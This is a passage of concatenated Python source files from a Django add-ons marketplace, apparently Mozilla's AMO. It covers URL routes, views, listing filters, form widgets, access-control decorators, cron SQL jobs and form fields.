    # For happy install button debugging.
    url('^addons/smorgasbord$', 'addons.buttons.smorgasbord'),
    # Remora EULA and Privacy policy URLS.  Raw strings so '\d' is a real
    # regex escape rather than a deprecated invalid string escape.
    (r'^addons/policy/0/(?P<addon_id>\d+)/(?P<file_id>\d+)',
     lambda r, addon_id, file_id: redirect('addons.eula',
                                           addon_id, file_id, permanent=True)),
    (r'^addons/policy/0/(?P<addon_id>\d+)/',
     lambda r, addon_id: redirect('addons.privacy',
                                  addon_id, permanent=True)),
)
########NEW FILE########
__FILENAME__ = utils
import hashlib
import logging
import random
from django.db.models import Q
from django.utils.encoding import smart_str
import commonware.log
from cache_nuggets.lib import memoize
import amo
# md5 of the lowercased, stripped key -- used to build stable cache keys.
safe_key = lambda x: hashlib.md5(smart_str(x).lower().strip()).hexdigest()
log = commonware.log.getLogger('z.redis')
rnlog = logging.getLogger('z.rn')
def reverse_name_lookup(key, webapp=False):
    """Return the id of the add-on (or app) whose name matches ``key``.

    Returns None when nothing matches.  If the name is ambiguous, a
    warning is logged and the first match wins.
    """
    from addons.models import Addon
    addon_type = 'app' if webapp else 'addon'
    qs = Addon.objects.filter(name__localized_string=key).no_cache()
    if webapp:
        qs = qs.filter(type=amo.ADDON_WEBAPP)
    else:
        qs = qs.exclude(type=amo.ADDON_WEBAPP)
    ids = list(qs.distinct().values_list('id', flat=True))
    if not ids:
        return None  # Explicitly return None for no results
    if len(ids) > 1:
        rnlog.warning('Multiple returned for [%s:%s]: %s' % (addon_type,
                                                             key, ids))
    return ids[0]
@memoize('addons:featured', time=60 * 10)
def get_featured_ids(app, lang=None, type=None):
    """Return a shuffled list of featured add-on ids for `app`.

    Locale-specific features (matching `lang`) come first, followed by
    features without a locale restriction.  Memoized for 10 minutes.
    """
    from addons.models import Addon
    ids = []
    is_featured = (Q(collections__featuredcollection__isnull=False) &
                   Q(collections__featuredcollection__application__id=app.id))
    qs = Addon.objects.all()
    if type:
        qs = qs.filter(type=type)
    if lang:
        has_locale = qs.filter(
            is_featured &
            Q(collections__featuredcollection__locale__iexact=lang))
        if has_locale.exists():
            ids += list(has_locale.distinct().values_list('id', flat=True))
        # Features with no locale (NULL or empty string) apply everywhere.
        none_qs = qs.filter(
            is_featured &
            Q(collections__featuredcollection__locale__isnull=True))
        blank_qs = qs.filter(is_featured &
                             Q(collections__featuredcollection__locale=''))
        qs = none_qs | blank_qs
    else:
        qs = qs.filter(is_featured)
    other_ids = list(qs.distinct().values_list('id', flat=True))
    # Shuffle within each tier; locale-specific features stay in front.
    random.shuffle(ids)
    random.shuffle(other_ids)
    ids += other_ids
    return map(int, ids)
########NEW FILE########
__FILENAME__ = views
import functools
from django import http
from django.shortcuts import (get_list_or_404, get_object_or_404, redirect,
render)
from django.views.decorators.vary import vary_on_headers
import commonware.log
import session_csrf
from mobility.decorators import mobilized
from tower import ugettext as _, ugettext_lazy as _lazy
import amo
from abuse.models import send_abuse_report
from amo import messages, urlresolvers
from amo.forms import AbuseForm
from amo.models import manual_order
from amo.urlresolvers import reverse
from reviews.models import Review
from translations.query import order_by_translation
from versions.models import Version
from .decorators import addon_view_factory
from .models import Addon
log = commonware.log.getLogger('z.addons')
# View decorators resolving an add-on slug/id against different querysets.
addon_view = addon_view_factory(qs=Addon.objects.valid)
addon_unreviewed_view = addon_view_factory(qs=Addon.objects.unreviewed)
addon_disabled_view = addon_view_factory(qs=Addon.objects.valid_and_disabled)
def author_addon_clicked(f):
    """Decorator redirecting clicks on "Other add-ons by author"."""
    @functools.wraps(f)
    def decorated(request, *args, **kwargs):
        selected = request.GET.get('addons-author-addons-select', None)
        if not selected:
            return f(request, *args, **kwargs)
        try:
            addon_id = int(selected)
        except ValueError:
            return http.HttpResponseBadRequest('Invalid add-on ID.')
        detail = reverse('addons.detail', args=[addon_id])
        return http.HttpResponsePermanentRedirect(detail)
    return decorated
@addon_disabled_view
def addon_detail(request, addon):
    """Add-ons details page dispatcher."""
    if addon.is_deleted:
        raise http.Http404
    if addon.is_disabled:
        # Disabled add-ons render a dedicated page with a 404 status.
        return render(request, 'addons/impala/disabled.html',
                      {'addon': addon}, status=404)
    if addon.is_webapp():
        # Apps don't deserve AMO detail pages.
        raise http.Http404
    # addon needs to have a version and be valid for this app.
    if addon.type in request.APP.types:
        if not addon.current_version:
            raise http.Http404
        return extension_detail(request, addon)
    else:
        # Redirect to an app that supports this type.
        try:
            new_app = [a for a in amo.APP_USAGE if addon.type
                       in a.types][0]
        except IndexError:
            raise http.Http404
        else:
            # Rewrite the URL prefix so reverse() targets the other app.
            prefixer = urlresolvers.get_url_prefix()
            prefixer.app = new_app.short
            return http.HttpResponsePermanentRedirect(reverse(
                'addons.detail', args=[addon.slug]))
@vary_on_headers('X-Requested-With')
def extension_detail(request, addon):
    """Extensions details page."""
    # If current version is incompatible with this app, redirect.
    comp_apps = addon.compatible_apps
    if comp_apps and request.APP not in comp_apps:
        prefixer = urlresolvers.get_url_prefix()
        prefixer.app = comp_apps.keys()[0].short
        return redirect('addons.detail', addon.slug, permanent=True)
    # Addon recommendations.
    recommended = Addon.objects.listed(request.APP).filter(
        recommended_for__addon=addon)[:6]
    ctx = {
        'addon': addon,
        'src': request.GET.get('src', 'dp-btn-primary'),
        'version_src': request.GET.get('src', 'dp-btn-version'),
        'tags': addon.tags.not_blacklisted(),
        'recommendations': recommended,
        'reviews': Review.objects.valid().filter(addon=addon, is_latest=True),
        'get_replies': Review.get_replies,
        'abuse_form': AbuseForm(request=request),
    }
    # details.html just returns the top half of the page for speed. The bottom
    # does a lot more queries we don't want on the initial page load.
    if request.is_ajax():
        # Other add-ons/apps from the same author(s).
        ctx['author_addons'] = addon.authors_other_addons(app=request.APP)[:6]
        return render(request, 'addons/impala/details-more.html', ctx)
    else:
        # Webapps get an app-flavored search placeholder.
        if addon.is_webapp():
            ctx['search_placeholder'] = 'apps'
        return render(request, 'addons/impala/details.html', ctx)
@mobilized(extension_detail)
def extension_detail(request, addon):
    # Mobile variant: render the lightweight mobile template instead.
    return render(request, 'addons/mobile/details.html', {'addon': addon})
class BaseFilter(object):
    """
    Filters help generate querysets for add-on listings.
    You have to define ``opts`` on the subclass as a sequence of (key, title)
    pairs. The key is used in GET parameters and the title can be used in the
    view.
    The chosen filter field is combined with the ``base`` queryset using
    the ``key`` found in request.GET. ``default`` should be a key in ``opts``
    that's used if nothing good is found in request.GET.
    """
    def __init__(self, request, base, key, default, model=Addon):
        self.opts_dict = dict(self.opts)
        # `extras` is an optional subclass hook for hidden sort options.
        self.extras_dict = dict(self.extras) if hasattr(self, 'extras') else {}
        self.request = request
        self.base_queryset = base
        self.key = key
        self.model = model
        self.field, self.title = self.options(self.request, key, default)
        self.qs = self.filter(self.field)
    def options(self, request, key, default):
        """Get the (option, title) pair we want according to the request."""
        if key in request.GET and (request.GET[key] in self.opts_dict or
                                   request.GET[key] in self.extras_dict):
            opt = request.GET[key]
        else:
            opt = default
        if opt in self.opts_dict:
            title = self.opts_dict[opt]
        else:
            title = self.extras_dict[opt]
        return opt, title
    def all(self):
        """Get a full mapping of {option: queryset}."""
        return dict((field, self.filter(field)) for field in dict(self.opts))
    def filter(self, field):
        """Get the queryset for the given field."""
        filter = self._filter(field) & self.base_queryset
        # A subclass may define order_<field> to post-process the queryset.
        order = getattr(self, 'order_%s' % field, None)
        if order:
            return order(filter)
        return filter
    def _filter(self, field):
        # Dispatch to the matching filter_<field> method.
        return getattr(self, 'filter_%s' % field)()
    def filter_featured(self):
        # Random featured order, preserved in SQL via manual_order.
        ids = self.model.featured_random(self.request.APP, self.request.LANG)
        return manual_order(self.model.objects, ids, 'addons.id')
    def filter_price(self):
        return self.model.objects.order_by('addonpremium__price__price', 'id')
    def filter_free(self):
        if self.model == Addon:
            return self.model.objects.top_free(self.request.APP, listed=False)
        else:
            return self.model.objects.top_free(listed=False)
    def filter_paid(self):
        if self.model == Addon:
            return self.model.objects.top_paid(self.request.APP, listed=False)
        else:
            return self.model.objects.top_paid(listed=False)
    def filter_popular(self):
        return (self.model.objects.order_by('-weekly_downloads')
                .with_index(addons='downloads_type_idx'))
    def filter_downloads(self):
        # Alias of 'popular'.
        return self.filter_popular()
    def filter_users(self):
        return (self.model.objects.order_by('-average_daily_users')
                .with_index(addons='adus_type_idx'))
    def filter_created(self):
        return (self.model.objects.order_by('-created')
                .with_index(addons='created_type_idx'))
    def filter_updated(self):
        return (self.model.objects.order_by('-last_updated')
                .with_index(addons='last_updated_type_idx'))
    def filter_rating(self):
        return (self.model.objects.order_by('-bayesian_rating')
                .with_index(addons='rating_type_idx'))
    def filter_hotness(self):
        return self.model.objects.order_by('-hotness')
    def filter_name(self):
        # Names are translated, so ordering goes through the translation
        # tables rather than a plain order_by.
        return order_by_translation(self.model.objects.all(), 'name')
class ESBaseFilter(BaseFilter):
    """BaseFilter that uses elasticsearch."""
    # The previous no-op __init__ (which only delegated to the parent with
    # identical arguments) has been removed as redundant.
    def filter(self, field):
        """Map a sort key onto an elasticsearch order_by expression."""
        sorts = {'name': 'name_sort',
                 'created': '-created',
                 'updated': '-last_updated',
                 'popular': '-weekly_downloads',
                 'users': '-average_daily_users',
                 'rating': '-bayesian_rating'}
        return self.base_queryset.order_by(sorts[field])
class HomepageFilter(BaseFilter):
    """Sort options offered on the homepage add-on listing."""
    opts = (('featured', _lazy(u'Featured')),
            ('popular', _lazy(u'Popular')),
            ('new', _lazy(u'Recently Added')),
            ('updated', _lazy(u'Recently Updated')))
    # 'new' sorts by creation date.
    filter_new = BaseFilter.filter_created
# Define a placeholder home response until we can hunt down all the places
# it is called from and remove them.
def home(request):
    """Placeholder homepage: always responds with the literal body 'home'."""
    return http.HttpResponse('home')
@addon_view
def eula(request, addon, file_id=None):
    """Show the EULA (for a specific file when `file_id` is given), or
    redirect to the detail page when the add-on has no EULA."""
    if not addon.eula:
        return http.HttpResponseRedirect(addon.get_url_path())
    if file_id:
        version = get_object_or_404(addon.versions, files__id=file_id)
    else:
        version = addon.current_version
    return render(request, 'addons/eula.html',
                  {'addon': addon, 'version': version})
@addon_view
def privacy(request, addon):
    """Show the privacy policy, or bounce to the detail page if none."""
    if not addon.privacy_policy:
        return http.HttpResponseRedirect(addon.get_url_path())
    return render(request, 'addons/privacy.html', {'addon': addon})
@addon_view
def developers(request, addon, page):
    """'Meet the developers' pages; `page` is one of 'developers',
    'installed' or 'roadblock' and picks the tracking src values."""
    if 'version' in request.GET:
        qs = addon.versions.filter(files__status__in=amo.VALID_STATUSES)
        version = get_list_or_404(qs, version=request.GET['version'])[0]
    else:
        version = addon.current_version
    if 'src' in request.GET:
        contribution_src = src = request.GET['src']
    else:
        page_srcs = {
            'developers': ('developers', 'meet-developers'),
            'installed': ('meet-the-developer-post-install', 'post-download'),
            'roadblock': ('meetthedeveloper_roadblock', 'roadblock'),
        }
        # Download src and contribution_src are different.
        src, contribution_src = page_srcs.get(page)
    return render(request, 'addons/impala/developers.html',
                  {'addon': addon, 'page': page, 'src': src,
                   'contribution_src': contribution_src,
                   'version': version})
@addon_view
def license(request, addon, version=None):
    """Show the license for one valid-status version of the add-on.

    NOTE(review): this view shadows the ``license`` builtin; renaming it
    would break the ``views.license`` URLconf reference, so it stays.
    """
    if version is not None:
        qs = addon.versions.filter(files__status__in=amo.VALID_STATUSES)
        version = get_list_or_404(qs, version=version)[0]
    else:
        version = addon.current_version
    if not (version and version.license):
        raise http.Http404
    return render(request, 'addons/impala/license.html',
                  dict(addon=addon, version=version))
def license_redirect(request, version):
    """Permanently redirect a version pk to that version's license URL."""
    version = get_object_or_404(Version, pk=version)
    return redirect(version.license_url(), permanent=True)
@session_csrf.anonymous_csrf_exempt
@addon_view
def report_abuse(request, addon):
    """Full-page abuse report form; sends the report on a valid POST."""
    form = AbuseForm(request.POST or None, request=request)
    if request.method == "POST" and form.is_valid():
        send_abuse_report(request, addon, form.cleaned_data['text'])
        messages.success(request, _('Abuse reported.'))
        return http.HttpResponseRedirect(addon.get_url_path())
    else:
        return render(request, 'addons/report_abuse_full.html',
                      {'addon': addon, 'abuse_form': form})
########NEW FILE########
__FILENAME__ = widgets
from django import forms
from django.conf import settings
from django.utils.encoding import force_unicode
from django.utils.html import conditional_escape
from django.utils.safestring import mark_safe
from tower import ugettext as _
from addons.models import Category
class IconWidgetRenderer(forms.RadioSelect.renderer):
    """ Return radiobox as a list of images. """
    def render(self):
        """ This will output radios as li>img+input. """
        output = []
        for w in self:
            value = w.choice_value
            # Built-in icons ('icon/...' or the empty value) render as an
            # image link; any other value becomes a hidden list item.
            if value.split('/')[0] == 'icon' or value == '':
                o = (("<li><a href='#' class='%s'><img src='%s/%s-32.png'>"
                      "</a>%s</li>") %
                     ('active' if self.value == w.choice_value else '',
                      settings.ADDON_ICONS_DEFAULT_URL, w.choice_label, w))
            else:
                o = "<li class='hide'>%s</li>" % w
            output.append(o)
        return mark_safe(u'\n'.join(output))
class CategoriesSelectMultiple(forms.CheckboxSelectMultiple):
    """Widget that formats the Categories checkboxes.

    Renders two checkbox groups: the regular categories, and a single
    "misc" catch-all choice shown in its own list at the end.
    """
    def __init__(self, **kwargs):
        super(self.__class__, self).__init__(**kwargs)
    def render(self, name, value, attrs=None):
        value = value or []
        has_id = attrs and 'id' in attrs
        final_attrs = self.build_attrs(attrs, name=name)
        choices = []
        other = None
        # ids of the catch-all ("misc") categories in the database.
        miscs = Category.objects.filter(misc=True).values_list('id', flat=True)
        for c in self.choices:
            if c[0] in miscs:
                # Replace the misc category's label with friendlier wording.
                other = (c[0],
                         _("My add-on doesn't fit into any of the categories"))
            else:
                choices.append(c)
        choices = list(enumerate(choices))
        choices_size = len(choices)
        groups = [choices]
        if other:
            # The misc choice goes in a second group, rendered after the rest.
            groups.append([(choices_size, other)])
        str_values = set([force_unicode(v) for v in value])
        output = []
        for (k, group) in enumerate(groups):
            # Group 1 (the misc choice) gets its own CSS class.
            cls = 'addon-misc-category' if k == 1 else 'addon-categories'
            output.append(u'<ul class="%s checkbox-choices">' % cls)
            for i, (option_value, option_label) in group:
                if has_id:
                    # Give each checkbox a unique id derived from the widget's.
                    final_attrs = dict(final_attrs, id='%s_%s' % (
                        attrs['id'], i))
                    label_for = u' for="%s"' % final_attrs['id']
                else:
                    label_for = ''
                # check_test marks the box checked when its value was selected.
                cb = forms.CheckboxInput(
                    final_attrs, check_test=lambda value: value in str_values)
                option_value = force_unicode(option_value)
                rendered_cb = cb.render(name, option_value)
                option_label = conditional_escape(force_unicode(option_label))
                output.append(u'<li><label%s>%s %s</label></li>' % (
                    label_for, rendered_cb, option_label))
            output.append(u'</ul>')
        return mark_safe(u'\n'.join(output))
########NEW FILE########
__FILENAME__ = context_processors
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.utils import translation
from django.utils.http import urlquote
import waffle
from cache_nuggets.lib import memoize
from tower import ugettext as _
import amo
from amo.urlresolvers import remora_url, reverse
from access import acl
from zadmin.models import get_config
def app(request):
    """Context processor exposing the current app (request.APP) as APP."""
    current_app = getattr(request, 'APP', None)
    return {'APP': current_app}
def static_url(request):
    # Context processor: expose settings.STATIC_URL to templates.
    return {'STATIC_URL': settings.STATIC_URL}
def i18n(request):
    """Context processor exposing localization info to templates."""
    # Prefer the URL-map spelling of the active language, falling back to
    # the raw language code.
    lang = (settings.LANGUAGE_URL_MAP.get(translation.get_language())
            or translation.get_language())
    direction = 'rtl' if translation.get_language_bidi() else 'ltr'
    return {'LANGUAGES': settings.LANGUAGES, 'LANG': lang, 'DIR': direction}
@memoize('collect-timings')
def get_collect_timings():
    # The flag has to be enabled for everyone and then we'll use that
    # percentage in the pages.
    try:
        flag = waffle.models.Flag.objects.get(name='collect-timings')
    except waffle.models.Flag.DoesNotExist:
        return 0
    if flag.everyone and flag.percent:
        return float(flag.percent) / 100.0
    return 0
def global_settings(request):
    """
    Storing standard AMO-wide information used in global headers, such as
    account links and settings.
    """
    account_links = []
    tools_links = []
    context = {}
    tools_title = _('Tools')
    is_reviewer = False
    if request.user.is_authenticated():
        amo_user = request.amo_user
        profile = request.user
        is_reviewer = acl.check_reviewer(request)
        # Account menu: profile, (optionally) collections, then logout.
        account_links.append({'text': _('My Profile'),
                              'href': profile.get_url_path()})
        if not settings.APP_PREVIEW:
            account_links.append({
                'text': _('My Collections'),
                'href': reverse('collections.user', args=[amo_user.username])})
        account_links.append({
            'text': _('Log out'),
            'href': remora_url('/users/logout?to=' + urlquote(request.path)),
        })
        # Tools menu: built incrementally based on the user's roles.
        if request.amo_user.is_developer:
            tools_links.append({'text': _('Manage My Submissions'),
                                'href': reverse('devhub.addons')})
        tools_links += [
            {'text': _('Submit a New Add-on'),
             'href': reverse('devhub.submit.1')},
            {'text': _('Developer Hub'),
             'href': reverse('devhub.index')},
        ]
        if is_reviewer:
            tools_links.append({'text': _('Editor Tools'),
                                'href': reverse('editors.home')})
        if (acl.action_allowed(request, 'Admin', '%') or
            acl.action_allowed(request, 'AdminTools', 'View')):
            tools_links.append({'text': _('Admin Tools'),
                                'href': reverse('zadmin.home')})
        context['amo_user'] = request.amo_user
    else:
        # Anonymous visitors get an AnonymousUser and empty link lists.
        context['amo_user'] = AnonymousUser()
    context.update({'account_links': account_links,
                    'settings': settings, 'amo': amo,
                    'tools_links': tools_links,
                    'tools_title': tools_title,
                    'ADMIN_MESSAGE': get_config('site_notice'),
                    'collect_timings_percent': get_collect_timings(),
                    'is_reviewer': is_reviewer})
    return context
########NEW FILE########
__FILENAME__ = cron
from django.db import connection, transaction
import cronjobs
import commonware.log
import amo
log = commonware.log.getLogger('z.cron')
@cronjobs.register
def expired_resetcode():
    """
    Delete password reset codes that have expired.

    Runs raw SQL that resets both reset-code columns to their column
    defaults for any row whose expiry is in the past.
    """
    log.debug('Removing reset codes that have expired...')
    cursor = connection.cursor()
    cursor.execute("""
    UPDATE users SET resetcode=DEFAULT,
                     resetcode_expires=DEFAULT
    WHERE resetcode_expires < NOW()
    """)
    transaction.commit_unless_managed()
@cronjobs.register
def category_totals():
    """
    Update category counts for sidebar navigation.

    Counts distinct add-ons per category (only valid, active add-ons with
    valid files) and writes the totals into categories.count in one UPDATE.
    """
    log.debug('Starting category counts update...')
    # One '%s' placeholder per valid status, used for both IN (...) clauses.
    p = ",".join(['%s'] * len(amo.VALID_STATUSES))
    cursor = connection.cursor()
    cursor.execute("""
    UPDATE categories AS t INNER JOIN (
     SELECT at.category_id, COUNT(DISTINCT Addon.id) AS ct
      FROM addons AS Addon
      INNER JOIN versions AS Version ON (Addon.id = Version.addon_id)
      INNER JOIN applications_versions AS av ON (av.version_id = Version.id)
      INNER JOIN addons_categories AS at ON (at.addon_id = Addon.id)
      INNER JOIN files AS File ON (Version.id = File.version_id
                                   AND File.status IN (%s))
      WHERE Addon.status IN (%s) AND Addon.inactive = 0
      GROUP BY at.category_id)
    AS j ON (t.id = j.category_id)
    SET t.count = j.ct
    """ % (p, p), amo.VALID_STATUSES * 2)
    transaction.commit_unless_managed()
########NEW FILE########
__FILENAME__ = decorators
import datetime
import functools
import json
from django import http
from django.conf import settings
from django.core.exceptions import PermissionDenied
import commonware.log
from . import models as context
from .utils import JSONEncoder, redirect_for_login
from amo import get_user, set_user
from users.utils import get_task_user
task_log = commonware.log.getLogger('z.task')
def login_required(f=None, redirect=True):
    """
    Like Django's login_required, but with to= instead of next=.

    If redirect=False then we return 401 instead of redirecting to the
    login page. That's nice for ajax views.
    """
    def decorator(func):
        @functools.wraps(func)
        def wrapper(request, *args, **kw):
            # Guard clause: handle the anonymous case first.
            if not request.user.is_authenticated():
                if redirect:
                    return redirect_for_login(request)
                return http.HttpResponse(status=401)
            return func(request, *args, **kw)
        return wrapper
    # Support both @login_required and @login_required(redirect=False).
    return decorator(f) if f else decorator
def post_required(f):
    """Reject any request whose method is not POST with a 405 response."""
    @functools.wraps(f)
    def wrapper(request, *args, **kw):
        if request.method == 'POST':
            return f(request, *args, **kw)
        return http.HttpResponseNotAllowed(['POST'])
    return wrapper
def permission_required(app, action):
    """Require login plus the given (app, action) ACL permission."""
    def decorator(f):
        @functools.wraps(f)
        @login_required
        def wrapper(request, *args, **kw):
            from access import acl
            if not acl.action_allowed(request, app, action):
                raise PermissionDenied
            return f(request, *args, **kw)
        return wrapper
    return decorator
def any_permission_required(pairs):
    """
    If any permission passes, call the function. Otherwise raise 403.
    """
    def decorator(f):
        @functools.wraps(f)
        @login_required
        def wrapper(request, *args, **kw):
            from access import acl
            # Short-circuits on the first granted permission.
            if any(acl.action_allowed(request, app, action)
                   for app, action in pairs):
                return f(request, *args, **kw)
            raise PermissionDenied
        return wrapper
    return decorator
def restricted_content(f):
    """
    Prevent access to a view function for accounts restricted from
    posting user-generated content.
    """
    @functools.wraps(f)
    def wrapper(request, *args, **kw):
        from access import acl
        # Admins ('*', '*') bypass the Restricted/UGC check entirely.
        allowed = (acl.action_allowed(request, '*', '*')
                   or not acl.action_allowed(request, 'Restricted', 'UGC'))
        if not allowed:
            raise PermissionDenied
        return f(request, *args, **kw)
    return wrapper
def modal_view(f):
    """Force the wrapped view to always be called with modal=True."""
    @functools.wraps(f)
    def wrapper(*args, **kw):
        return f(*args, modal=True, **kw)
    return wrapper
def json_response(response, has_trans=False, status_code=200):
    """
    Return a response as JSON. If you are just wrapping a view,
    then use the json_view decorator.
    """
    # JSONEncoder knows how to serialize translated fields; cls=None falls
    # back to json's default encoder.
    encoder = JSONEncoder if has_trans else None
    body = json.dumps(response, cls=encoder)
    return http.HttpResponse(body, content_type='application/json',
                             status=status_code)
def json_view(f=None, has_trans=False, status_code=200):
    """Serialize a view's return value to JSON, unless the view already
    produced an HttpResponse (which is passed through untouched)."""
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kw):
            result = func(*args, **kw)
            if isinstance(result, http.HttpResponse):
                return result
            return json_response(result, has_trans=has_trans,
                                 status_code=status_code)
        return wrapper
    # Support both @json_view and @json_view(has_trans=..., ...).
    return decorator(f) if f else decorator


# Convenience helper: a 400 response with a JSON body.
json_view.error = lambda s: http.HttpResponseBadRequest(
    json.dumps(s), content_type='application/json')
class skip_cache(object):
    """Decorator that runs the wrapped callable with caching disabled.

    Works on plain functions and, via __get__, on methods.
    """
    def __init__(self, f):
        self.f = f
        functools.update_wrapper(self, f)

    def __call__(self, *args, **kw):
        with context.skip_cache():
            return self.f(*args, **kw)

    def __repr__(self):
        # Bug fix: the original built this string but never returned it, so
        # repr() silently fell back to the default object representation.
        return "<SkipCache %s>" % (self.f,)

    def __get__(self, obj, typ=None):
        # Re-wrap the bound method so instance access stays decorated.
        return skip_cache(self.f.__get__(obj, typ))
def use_master(f):
    """Route all database queries made inside *f* to the master database."""
    @functools.wraps(f)
    def inner(*args, **kwargs):
        with context.use_master():
            return f(*args, **kwargs)
    return inner
def write(f):
    # Combined decorator for write paths: hit the master DB and skip caching.
    return use_master(skip_cache(f))
def set_modified_on(f):
    """
    Will update the modified timestamp on the provided objects when the wrapped
    function exits sucessfully (returns a truthy value). If the function
    returns a dict, it will also use that dict as additional keyword arguments
    to update on the provided objects.
    Looks up objects defined in the set_modified_on kwarg.
    """
    from amo.tasks import set_modified_on_object
    @functools.wraps(f)
    def wrapper(*args, **kw):
        # Objects to touch are passed by callers via the set_modified_on kwarg
        # and stripped out before calling the wrapped function.
        objs = kw.pop('set_modified_on', None)
        result = f(*args, **kw)
        if objs and result:
            # A dict result doubles as extra fields to set on each object.
            extra_kwargs = result if isinstance(result, dict) else {}
            for obj in objs:
                task_log.info('Delaying setting modified on object: %s, %s' %
                              (obj.__class__.__name__, obj.pk))
                # The task runs after NFS_LAG_DELAY seconds — presumably to
                # let NFS-backed file writes settle first; confirm before
                # changing.
                set_modified_on_object.apply_async(
                    args=[obj], kwargs=extra_kwargs,
                    eta=datetime.datetime.now() +
                        datetime.timedelta(seconds=settings.NFS_LAG_DELAY))
        return result
    return wrapper
def allow_cross_site_request(f):
    """Allow other sites to access this resource, see
    https://developer.mozilla.org/en/HTTP_access_control."""
    @functools.wraps(f)
    def wrapper(request, *args, **kw):
        response = f(request, *args, **kw)
        # Access-Control-Allow-Credentials is deliberately NOT set: without
        # it, browsers won't expose data that required cookies to fetch.
        # This is a good thing, let's keep it that way.
        response['Access-Control-Allow-Origin'] = '*'
        response['Access-Control-Allow-Methods'] = 'GET'
        return response
    return wrapper
def set_task_user(f):
    """Sets the user to be the task user, then unsets it."""
    @functools.wraps(f)
    def wrapper(*args, **kw):
        previous_user = get_user()
        set_user(get_task_user())
        try:
            # Restore the previous user even if f raises.
            return f(*args, **kw)
        finally:
            set_user(previous_user)
    return wrapper
def allow_mine(f):
    """Treat the literal username `mine` as the logged-in user's username."""
    @functools.wraps(f)
    def wrapper(request, username, *args, **kw):
        if username != 'mine':
            return f(request, username, *args, **kw)
        # 'mine' requires a logged-in user to resolve against.
        if not request.amo_user:
            return redirect_for_login(request)
        return f(request, request.amo_user.username, *args, **kw)
    return wrapper
########NEW FILE########
__FILENAME__ = ext
import jinja2.runtime
from jinja2 import nodes
import caching.ext
class FragmentCacheExtension(caching.ext.FragmentCacheExtension):
    """Extends the default fragment cache to include request.APP in the key."""
    def process_cache_arguments(self, args):
        # Append the template's `request` so _cache_support receives it.
        args.append(nodes.Getattr(nodes.ContextReference(), 'request', 'load'))
    def _cache_support(self, name, obj, timeout, extra, request, caller):
        if isinstance(request, jinja2.runtime.Undefined):
            # No request in the template context: fall back to the plain name.
            key = name
        else:
            # Never serve cached fragments to authenticated users.
            if request.user.is_authenticated():
                return caller()
            else:
                key = '%s:%s' % (name, request.APP.id)
        sup = super(FragmentCacheExtension, self)._cache_support
        return sup(key, obj, timeout, extra, caller)
# Jinja expects the extension under this name.
cache = FragmentCacheExtension
########NEW FILE########
__FILENAME__ = fields
import re
from django.core import exceptions
from django.db import models
from django.forms import fields
from tower import ugettext as _
from amo.widgets import ColorWidget
class DecimalCharField(models.DecimalField):
    """Like the standard django DecimalField but stored in a varchar

    In order to gracefully read crappy data, use nullify_invalid=True.
    This will set the field's value to None rather than raising an exception
    whenever a non-null, non-decimal string is read from a queryset.
    However, use this option with caution as it also prevents exceptions
    from being raised during model property assignment. This could allow you
    to "successfuly" save a ton of data when all that is really written
    is NULL. It might be best to combine this with the null=False option.
    """
    description = 'Decimal number stored as a varchar'
    __metaclass__ = models.SubfieldBase
    def __init__(self, verbose_name=None, name=None, max_digits=None,
                 decimal_places=None, nullify_invalid=False, **kwargs):
        self.nullify_invalid = nullify_invalid
        # +1 leaves room for the decimal point in the varchar column.
        kwargs['max_length'] = max_digits + 1
        super(DecimalCharField, self).__init__(verbose_name, name,
            max_digits=max_digits, decimal_places=decimal_places, **kwargs)
    def get_internal_type(self):
        # Store as a varchar despite the DecimalField validation behavior.
        return "CharField"
    def to_python(self, value):
        try:
            return super(DecimalCharField, self).to_python(value)
        except exceptions.ValidationError:
            # Optionally swallow bad data as None (see class docstring).
            if self.nullify_invalid:
                return None
            else:
                raise
    def get_db_prep_save(self, value, connection, prepared=False):
        if prepared:
            return value
        else:
            return self.get_prep_value(value)
    def get_prep_value(self, value):
        if value is None:
            return value
        # Serialize the Decimal with the configured digits/places.
        return self.format_number(value)
class ColorField(fields.CharField):
    """Form field that accepts a 6-digit hex color code such as ``#000000``."""
    widget = ColorWidget
    # Fix: use a raw string (the original "'^\#...'" relied on Python passing
    # the unrecognized '\#' escape through unchanged) and precompile once.
    _hex_color_re = re.compile(r'^#([0-9a-fA-F]{6})$')

    def __init__(self, max_length=7, min_length=None, *args, **kwargs):
        super(ColorField, self).__init__(max_length, min_length, *args,
                                         **kwargs)

    def clean(self, value):
        """Validate the usual CharField rules plus the hex-color format."""
        super(ColorField, self).clean(value)
        if value and not self._hex_color_re.match(value):
            raise exceptions.ValidationError(
                _(u'This must be a valid hex color code, such as #000000.'))
        return value
class SeparatedValuesField(fields.Field):
    """
    Field that allows the given base field to accept multiple values using
    the given separator.
    E.g.::
        >>> field = SeparatedValuesField(forms.EmailField)
        >>> field.clean(u'[email protected],, \n,[email protected]')
        u'[email protected], [email protected]'
    """
    def __init__(self, base_field, separator=None, *args, **kwargs):
        super(SeparatedValuesField, self).__init__(*args, **kwargs)
        # base_field is a field *class*; an instance is created per clean().
        self.base_field = base_field
        self.separator = separator or ','
    def clean(self, data):
        if not data:
            if self.required:
                raise exceptions.ValidationError(
                    _(u'Enter at least one value.'))
            else:
                return None
        # Python 2 idiom: strip each piece and drop empty strings.
        value_list = filter(None, map(unicode.strip,
                                      data.split(self.separator)))
        self.value_list = []
        base_field = self.base_field()
        # Each piece is validated by the base field; its ValidationError
        # propagates unchanged.
        for value in value_list:
            if value:
                self.value_list.append(base_field.clean(value))
        return u', '.join(self.value_list)
########NEW FILE########
__FILENAME__ = forms
from copy import copy
from django import forms
from django.conf import settings
import captcha.fields
import happyforms
from translations.fields import TranslatedField
class AbuseForm(happyforms.Form):
    """Abuse-report form; the captcha is shown only to anonymous users and
    only when a reCAPTCHA key is configured."""
    recaptcha = captcha.fields.ReCaptchaField(label='')
    text = forms.CharField(required=True,
                           label='',
                           widget=forms.Textarea())

    def __init__(self, *args, **kwargs):
        self.request = kwargs.pop('request')
        self.has_recaptcha = True
        super(AbuseForm, self).__init__(*args, **kwargs)
        needs_recaptcha = (self.request.user.is_anonymous()
                           and settings.RECAPTCHA_PRIVATE_KEY)
        if not needs_recaptcha:
            del self.fields['recaptcha']
            self.has_recaptcha = False
class AMOModelForm(happyforms.ModelForm):
    def _get_changed_data(self):
        """
        The standard modelform thinks the Translation PKs are the initial
        values. We need to dig deeper to assert whether there are indeed
        changes.
        """
        Model = self._meta.model
        if self._changed_data is None:
            # Start from Django's own notion of what changed.
            changed = copy(forms.ModelForm.changed_data.__get__(self))
